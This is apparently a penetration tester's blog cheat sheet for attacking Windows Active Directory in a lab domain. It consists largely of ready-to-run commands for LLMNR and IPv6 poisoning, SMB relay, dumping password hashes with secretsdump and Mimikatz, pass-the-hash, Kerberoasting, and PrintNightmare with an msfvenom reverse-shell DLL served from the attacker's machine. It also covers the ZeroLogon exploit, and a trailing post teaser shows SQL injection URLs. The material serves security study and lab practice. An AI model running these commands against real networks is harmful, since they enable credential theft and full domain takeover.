Attacking Active Directory Jutsus

-

Attacking Active Directory

1. LLMNR Poisoning

responder -I eth0
responder -I eth0 -rdw -v (old verison)
apt install responder (to debug if issues)

Run responder when you first get on the network. Keep it on the entire time.

What is LLMNR? (Link Local Mulitcase Name Resolution)

  1. Used to identify hosts when DNS fails to do so.
  2. Previously NBT-NS.
  3. Key flaw is that the service utilizes a users username and NTLMv2 hash when responded to.

How Attack Works: User requests a non-existing share called \\documents. DNS doesn't know what that is. The victim computer uses LLMNR to ask others within the domain if they know. Our attack computer says "YES we know!". The victim computer hands over their username and NTLM to us.

Victim computer hands over a NTLMv2 Hash.
Take that string and put it in a hash.txt file. Then crack the password via hashcat. 
hashcat -m 5600 pparker.txt /usr/share/wordlists/rockyou.txt

Video: https://www.youtube.com/watch?v=6jvGK5jld-I

2. SMB Relay Attack

What is SMB Relay?
- Instead of cracking hashes gathered with Responder, we can instead relay those hashes to specific machines and gain access.

Requirements

  1. SMB signing must be disabled on the target machine.
  2. Relayed user creds must be admin on the machine.
sudo nmap 192.168.200.* -p 445 --script smb2-security-mode
vim /usr/share/responder/Responder.conf
1. Go into Responder.conf. Turn off HTTP and SMB.
sudo responder -I eth0 -v
sudo impacket-ntlmrelayx -tf targets.txt -smb2support - OR -
sudo impacket-ntlmrelayx -tf targets.txt -smb2support -i (interactive shell)
2. Run responder and impacket-ntlmrelayx at the same time.
3. Put "Signing Enabled but not Required" computers into targets.txt.

3. IPv6 DNS Poisoning Attack

When a computer restarts (or every 30 minutes), IPv6 will request the DNS. By default, no DNS is specified for IPv6. Our attack computer says "I AM THE DNS!!".

Run both commands at the same time.

sudo python3 mitm6.py -d vulcan.local
sudo impacket-ntlmrelayx -6 -t ldaps://192.168.200.191 -wh fakewpadd.vulcan.local -l lootme3
-- After Exploit -- 
sudo impacket-secretsdump -dc-ip 192.168.200.191 'VULCAN.local/wQcIvVulBe:IHXIVi48Q6)*+$#'@192.168.200.191
sudo impacket-secretsdump -dc-ip 192.168.200.191 -hashes aad3b435b51404eeaad3b435b51404ee:8119935c5f7fa5f57135620c8073aaca 'VULCAN.local/Administrator'@192.168.200.191 -just-dc

If using tun0, fix the mitm6.py code. https://github.com/dirkjanm/mitm6/issues/16 Easy to install. Put in /opt folder pip3 install -r requirements. Should be good to go.

Only have a hash? That can work too.

_____

4. Pass the Password

crackmapexec smb 192.168.200.0/24 -u administrator -d VULCAN.local -p password123!
impacket-psexec 'VULCAN.local/administrator:password123!'@192.168.200.191
impacket-smbexec 'VULCAN.local/administrator:password123!'@192.168.200.191
impacket-wmiexec 'VULCAN.local/administrator:password123!'@192.168.200.191

crackmapexec will retry creds on the entire network. If PSExec doesn't work, odds are Windows Defender/Virus Protection is on.

5. Dump SAM Hashes with SecretsDump

sudo impacket-secretsdump -dc-ip 192.168.200.191 'VULCAN.local/wQcIvVulBe:IHXIVi48Q6)*+$#'@192.168.200.191
sudo impacket-secretsdump -dc-ip 192.168.200.191 -hashes aad3b435b51404eeaad3b435b51404ee:8119935c5f7fa5f57135620c8073aaca 'VULCAN.local/Administrator'@192.168.200.191 -just-dc

Screenshots at end of Section 3

6. Hashcat for NTLM Hashes

hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt (NTLM Sam Hashes)
hashcat -m 5600 pparker.txt /usr/share/wordlists/rockyou.txt (NTLMv2)

7. Pass the Hash

crackmapexec smb 192.168.200.0/24 -u "Administrator" -H  aad3b435b51404eeaad3b435b51404ee:8119935c5f7fa5f57135620c8073aaca
crackmapexec smb 192.168.200.0/24 -u "Administrator" -H  aad3b435b51404eeaad3b435b51404ee:8119935c5f7fa5f57135620c8073aaca --local-auth
impacket-psexec "VULCAN.local/annieh":@192.168.200.203 -hashes aad3b435b51404eeaad3b435b51404ee:8119935c5f7fa5f57135620c8073aaca
impacket-psexec "Administrator":@192.168.200.203 -hashes aad3b435b51404eeaad3b435b51404ee:8119935c5f7fa5f57135620c8073aaca

8. Token Impersonation

load incognito (type help for available commands)
list_tokens -u
impersonate_token vulcan\\Administrator
rev2self

Token Impersonation

Tokens: Temporary keys that allow you access to a system. Cookies for computers.

Two types of Tokens:

Delegate - Created for logging into a machine or using Remote Desktop.
Impersonate - "non-interactive" such as attaching a network drive or a domain logon script.

9. Kerberoasting

Goal: Get a TGS (Ticket Granting Service) from the Domain Controller. We can use the TGS to crack a service password using hashcat. Sometimes, Windows Services are misconfigured as Domain Admin Users. For example, we can get the TGS of SQLService, find the password to be "password123!" and then login to the domain controller.

GetUserSPNs.py vulcan.local/annieh:password123! -dc-ip 192.168.200.215 -request
hashcat -m 13100 krb5tgs.txt /usr/share/wordlists/rockyou.txt
  1. Request Ticket Granting Ticket (TGT), This TGT provides a username and NTLM hash to the DC.
  2. DC sends back a TGT encrypted with a krbtgt hash
  3. Request TGS (Ticket Granting Service) for Service needed (Present the TGT you now have)
  4. Recieve TGS encrypted with service account hash (TGS recieved).
  5. Crack that using hashcat.

10. AS-REP Kerberoasting

u = username (roastUsers taken from RPC output)
awk -F '[][]' '{ print $2 }' users.txt > roastUsers.txt
for u in $(cat roastUsers.txt); do GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb.local/$u@10.10.10.161; done

11. Mimikatz

Used to view and steal creds and generate Kerberos tickets. Dump creds stored in memory. Pass-The-Ticket, Golden, Silver Ticket. Mimikatz

C:\Users\Public\Documents>mimikatz.exe
mimikatz.exe
The system cannot execute the specified program.

Get this error? Windows Defender is on.

privilege::debug
sekurlsa::logonpasswords (get logged in users)
lsadump::sam OR lsadump::sam /patch (sometimes doesn't work)
lsadump::lsa /patch (good 2nd pick)

hashcat -m 1000 will work on the NTLM hash. The SHA1 is a stand-alone and can work with hashcat -m 170 sha1.txt /usr/share/wordlists/rockyou.txt too.

12. GPP Group Policy Preferences MS14-025

Allowed Admins to create policies using embedded credentials. Creds were encrypted and placed in a cPassword field. The GPP key was accidentally released. We can now decrypt GPP passwords. This only works on servers before the MS14-025 patch. Many Windows Server 2012 and before can be vulnerable.

Once you get username:password, try kerberoasting or secretsdump if login is not working.

msf> auxiliary/scanner/smb/smb_enum_gpp
msf> post/windows/gather/credentials/gpp

13. Passback Attack

You can get a LDAP password through a printer setup. The **** password is unavailable, but not if you set the IP to yourself and set netcat as a listener port.

https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack

14. PrintNightmare Attack

rpcdump.py 192.168.200.221 | egrep 'MS-RPRN|MS-PAR' (If both options exist, server is vuln)
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.200.187 lport=5555 -f dll > shell.dll
smbserver.py Share . -smb2support

python3 CVE-2021-1675.py 'jessica:password123='@192.168.200.221 '\\192.168.200.187\Share\shell.dll'
python3 CVE-2021-1675.py 'vulcan.local/annieh':'password123='@192.168.200.221 '\\192.168.200.187\Share\shell.dll'

The domain users haven't worked for me using this exploit. Could work on another box. Github: https://github.com/cube0x0/CVE-2021-1675 OR https://github.com/ly4k/PrintNightmare

15. ZeroLogon Attack

CVE-2020-1472. Used to change Administrator password to nothing. Be careful and use as last resort. Checking can be good enough.

https://github.com/SecuraBV/CVE-2020-1472
https://github.com/dirkjanm/CVE-2020-1472


ZeroLogon CVE-2020-1472

# Check Only
python3 zerologon_tester.py SPOCK-DC 192.168.200.136
# Exploit
python cve-2020-1472-exploit.py SPOCK-DC 192.168.200.136
impacket-secretsdump -just-dc VULCAN/SPOCK-DC\$@192.168.200.136

# Restore
impacket-secretsdump administrator@192.168.200.136 -hashes aad3b435b51404eeaad3b435b51404ee:8119935c5f7fa5f57135620c8073aaca 
Look for plain_password_hex
python restorepassword.py VULCAN/SPOCK-DC@SPOCK-DC -target-ip 192.168.200.136 -hexpass
(everything after plain_password_hex)

Comments

Post a Comment

Popular posts from this blog

HTB - Jarvis MySQL

-
Image
Brad Traversy MySQL CheatSheet PentestMonkey SQL CheatSheet MySQL Statement Architecture Jarvis Walkthrough Step 1 - Try to make your query. Visualize it. SELECT Id, Name, Rating, Picture, Cost, Description, UNKNOWN7Field FROM Room WHERE Id = 1 Queries don't need a " or ' Keep going up until it works http://10.10.10.143/room.php?cod=3 union select 1,2,3,4 http://10.10.10.143/room.php?cod=3 union select 1,2,3,4,5 http://10.10.10.143/room.php?cod=3 union select 1,2,3,4,5,6 http://10.10.10.143/room.php?cod=3 union select 1,2,3,4,5,6,7 -OR- http://10.10.10.143/room.php?cod=3 order by 1,2,3,4,5,6,7 The union select works when the left and right are equal in column size. If the left has 7 selections, the right needs 7 selections too SELECT Id, Rating, Name, Cost, Description, UNKNOWN6 FROM Room WHERE Id = 1 UNION SELECT 1,2,3,4,5,6 In order to shift to the right side, put in a faulty value for 1 like negative 1 or 9999 SELECT Id, Rating, Name, Co
Read more

Palo Alto for GNS3 CCDC Tutorial

-
Image
Opening Hello fellow CCDC Competitors! Struggling to get a Palo-Alto VM? I know how you can get one! Email me at ASzampiasSWD@gmail.com. I'll tell you the steps to get a PA-VM for GNS3. Why am I giving this info to you? Wouldn't it make sense to hog the info to myself? Wouldn't my team have an advantage? There are have and have not universities when it comes to PaloAltos. I fell into the "have not" group. Our college didn't have access to PA-VMs and still doesn't. Even if PA Cybersecurity Academy is free, there is too much red tape. I can't change the outcome. I can only come up with this one solution. Another reason is Tri-C is a tryout team. I think its pretty unfair as a potential Firewall Admin I'm the only one with access. No one can challenge me unless they spend 2K for a PA-VM. It becomes a rich-person only position. I have a leftover PA-VM from 2018 I promised not to share. I couldn't share that with my challengers. But I f
Read more

Trace Labs Global Missing Persons CTF V

-
Image
Trace Labs CTF V TraceLabs hosted the Global Missing Persons CTF V event on July 11, 2020. My team //synergy got 64th place out of 190 teams. Introduction This was my first Trace Labs CTF. I captained a team. The good thing about being a captain is you can control who is on the team. My rules were: Must have sock puppet accounts ready. Must have a VPN. Writing out this is a competitive team where we work the entire 6 hours. I was worried about a future team member spamming submissions and disqualifying the team. I thought my requirements would eliminate people who weren't serious. The team hit 4 members Friday evening pretty quickly. Notes My laptop was too slow for this event. My virtual machine froze and I had to restart. Restarting means I have to login to my accounts again. I'll use my desktop next time. The team used Slack and Trello. Our strategy was to research a person and rotate every hour. This strategy broke after 1 rotation. Some missin
Read more